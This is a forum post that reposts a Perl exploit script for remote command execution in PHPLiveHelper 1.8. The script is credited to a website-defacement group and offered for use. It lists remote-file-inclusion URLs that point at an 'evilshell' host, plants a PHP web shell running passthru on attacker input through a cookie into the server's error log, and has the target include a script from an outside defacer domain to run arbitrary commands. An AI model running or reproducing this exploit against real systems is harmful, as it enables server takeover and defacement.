Jump to content
Ras

PHPLiveHelper 1.8 Remote Command Execution Exploit

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
usr/bin/perl -w
# PHPLiveHelper 1.8 remote command execution Xploit
#
# Discovered & Coded By rUnViRuS
# World Defacers TeaM
# WD-members: rUnViRuS - Papipsycho - r3v3ng4ns
# Details
# =======
# Note : PHPLiveHelper 1.8 is vulnerable too, but its just that you
# cannot include file remotly.
#
# phplivehelper/initiate.php?abs_path=Http://evilshell
# waiting.php?abs_path=Http://evilshell
# welcome.php?abs_path=Http://evilshell
# admin/index.php?abs_path=Http://evilshell
# javascript.php?abs_path=Http://evilshell
# checkchat.php?abs_path=Http://evilshell
# blank.php?abs_path=Http://evilshell
#
# if (isset($abs_path) && $abs_path != "") {
#    include_once $abs_path."global.php";
# } else {
#    include_once "./global.php";
# .
# .
# .
#
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
use IO::Socket;

print "\n=============================================================================\r\n";
print " * TheMindPHPLiveHelper 1.8 Remote Command Execution by [url]www.worlddefacers.de[/url] *\r\n";   
print "=============================================================================\r\n";
print "\n\n[*] WD-members: rUnViRuS - Papipsycho - r3v3ng4ns \n";
print "[*] Bug On :TheMindPHPLiveHelper 1.8 Software \n";
print "[*] Discovered & Coded By : rUnViRuS\n";
print "[*] Join with us to Get Prvi8 Exploit \n";
print "[*] www.worlddefacers.de\n\n\n";
print "============================================================================\r\n";
print "          -=Coded by Zod, Bug Found by rUnViRuS=-\r\n";
print "           [url]www.worlddefacers.de[/url] - www.world-defacers.de\r\n";
print "============================================================================\r\n";
sub main::urlEncode {
    my ($string) = @_;
    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
    #$string# =~ tr/.//;
    return $string;
}

$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 3)
{
print "Usage:\r\n";
print "\n\n[*] usage: WD-TMPLH.pl <host> <Path> <cmd>\n";
    print "[*] usage: WD-TMPLH.pl [url]www.HosT.com[/url] /phplivehelper/ cmd (ls -ali\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}

  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
  or die "[+] Connecting ... Could not connect to host.\n\n";

  $shell='<?php ob_clean();echo"Hi Master!\r\n";ini_set("max_execution_time",0);passthru($_GET[CMD]);die;?>';
  $shell=urlEncode($shell);
  $data="loginname=sun&passwd=sun";
  print $sock "POST ".$path."users.php HTTP/1.1\r\n";
  print $sock "Host: ".$serv."\r\n";
  print $sock "Content-Length: ".length($data)."\r\n";
  print $sock "Cookie: gl_session=%27".$shell."\r\n";
  print $sock "Connection: Close\r\n\r\n";
  print $sock $data;
  close($sock);

  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
  or die "[+] Connecting ... Could not connect to host.\n\n";

  $xpl="../logs/error.log";
  $xpl=urlEncode($xpl)."";
  print $sock "GET ".$path."initiate.php?abs_path=http://www.world-defacers.com/cmd.jpg?&cmd=".$cmd." HTTP/1.1\r\n";
  print $sock "Host: ".$serv."\r\n";
  print $sock "Cookie: language=".$xpl.";\r\n";
  print $sock "Connection: Close\r\n\r\n";

  while ($answer = <$sock>) {
    print $answer;
  }
  close($sock);

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...